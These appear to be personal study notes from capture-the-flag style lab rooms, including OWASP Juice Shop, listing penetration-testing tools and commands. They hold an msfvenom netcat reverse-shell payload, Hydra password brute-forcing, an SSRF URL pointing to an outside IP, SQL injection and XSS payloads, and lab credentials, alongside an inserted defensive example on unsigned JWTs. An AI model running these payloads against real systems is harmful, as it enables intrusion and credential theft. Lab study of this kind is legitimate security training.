Tools

Jcrypt tool

OpenSSL

fcrackzip

Note App - Keep Note, Cherry Tree, Joplin, One Note

GreenShot, ShareX

ipaddressguide.com

whois

Nmap - to scan all ports -p-, --open (open ports)

Hydra - password cracking

telnet [ip] [port]

IP - 10.10.98.241

.RUN ping 10.10.209.129 -c 1

.RUN msfvenom -p cmd/unix/reverse_netcat lhost=10.10.209.129 lport=4444 R

nc -lvp 4444

-p = payload

lhost = our local host IP address (this is your machine's IP address)

lport = the port to listen on (this is the port on your machine)

R = export the payload in raw format

FTP

Ip - 10.10.74.134

login - ftp [IP]

Username - Mike

Hydra Syntax - "hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"

-t 4 = Number of parallel connections per target

-l [user] = Points to the user whose account you're trying to compromise

-P [path to dictionary] = Points to the file containing the list of possible passwords

-vV = Sets verbose mode to very verbose, shows the login+pass combination for each attempt

[machine IP] = The IP address of the target machine

ftp / protocol = Sets the protocol

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.74.134 ftp

Network services 2

Ip - 10.10.66.215

ls -la - see hidden files

sudo mount -t nfs 10.10.66.215:home /tmp/mount/ -nolock

id_rsa.pub file contains username

SMTP Using Metasploit

IP - 10.10.222.254

msfconsole - start metasploit

help - to view commands options

run - to run exploit

username - administrator

password

type of smtp server - Postfix (Ubuntu)

Cracking using hydra

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.222.254 ssh

Crackstation - Online Password cracker https://crackstation.net/

sqlite3 to access database

Syntax - sqlite3 [database file]

see tables using .tables command

use pragma table_info(selected table); to see the table information

use select * from users;

command line injection $(command)

Outdated components exploit

Exploit Database - https://www.exploit-db.com/

searchsploit command

python3 file.py -h url - python3 47887.py http://10.10.116.26:84

To calculate the different hashes in Linux, we can use the following commands:

md5sum WinSCP-5.21.5-Setup.exe

20c5329d7fde522338f037a7fe8a84eb

sha1sum WinSCP-5.21.5-Setup.exe

c55a60799cfa24c1aeffcd2ca609776722e84f1b

sha256sum WinSCP-5.21.5-Setup.exe

e141e9a1a0094095d5e26077311418a01dac429e68d3ff07a734385eb0172bea

MD5: 20c5329d7fde522338f037a7fe8a84eb

SHA-1: c55a60799cfa24c1aeffcd2ca609776722e84f1b

SHA-256: e141e9a1a0094095d5e26077311418a01dac429e68d3ff07a734385eb0172bea

Hash Generator https://www.srihash.org/

Use this online tool to encode/decode base64:

https://appdevtools.com/base64-encoder-decoder

{"typ":"JWT","alg":"none"}.{"username":"admin","exp":1698129274}.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk4MTI5Mjc0fQ==.
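Why the token above gets accepted, and the server-side check that rejects it, as an added example that is not part of the original notes. Assumptions: the server is meant to use HS256, and the key and function names (SECRET, issue, verify_trusting_header, verify_pinned) are made up for this sketch.

```python
import base64, hashlib, hmac, json, time

SECRET = b"constructed-demo-key"  # assumption: server-side HS256 key, made up here
# Token exactly as written in the note above (alg "none", empty signature).
NOTE_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=."
              "eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk4MTI5Mjc0fQ==.")

def b64d(seg):
    seg = seg.rstrip("=")  # accept padded or unpadded base64url segments
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def mac(head, body, key):
    # HS256 signs the two encoded segments exactly as they appear in the token.
    return hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()

def issue(claims, key=SECRET):
    head = b64e(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    body = b64e(json.dumps(claims).encode())
    return f"{head}.{body}.{b64e(mac(head, body, key))}"

def verify_trusting_header(token, key=SECRET):
    """Weak: the token's own header decides whether a signature is needed."""
    head, body, sig = token.split(".")
    if json.loads(b64d(head))["alg"].lower() == "none":
        return json.loads(b64d(body))  # no signature check at all
    ok = hmac.compare_digest(mac(head, body, key), b64d(sig))
    return json.loads(b64d(body)) if ok else None

def verify_pinned(token, key=SECRET, now=None):
    """Hardened: algorithm fixed by the server, signature and exp enforced."""
    try:
        head, body, sig = token.split(".")
        if json.loads(b64d(head)).get("alg") != "HS256":
            return None
        if not hmac.compare_digest(mac(head, body, key), b64d(sig)):
            return None
        claims = json.loads(b64d(body))
        if claims["exp"] <= (time.time() if now is None else now):
            return None
        return claims
    except (ValueError, KeyError, TypeError, AttributeError):
        return None

if __name__ == "__main__":
    print("trusting header:", verify_trusting_header(NOTE_TOKEN))
    print("pinned HS256:   ", verify_pinned(NOTE_TOKEN))
```

In a real service, use a maintained JWT library and pass it an explicit list of allowed algorithms rather than hand-rolling the check.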

http://10.10.116.26:8087/download?server=secure-file-storage.com:8087&id=75482342

http://10.10.116.26:8087/download?server=10.11.56.194:8087&id=75482342

passwordz mcsafes mc.safesearch@juice-sh.op My Noodles - Mr. N00dles

admin@juice-sh.op admin123

SQL injection

' or 1=1-- email --,

bruteforce password using burp

Persistent XSS Scripting

Add Header as part of payload - True-Client-IP

True-Client-IP <iframe src="Javascript:alert('xss')">

Reflected XSS

paste iframe url as part of webpage : <iframe src="Javascript:alert('xss')">
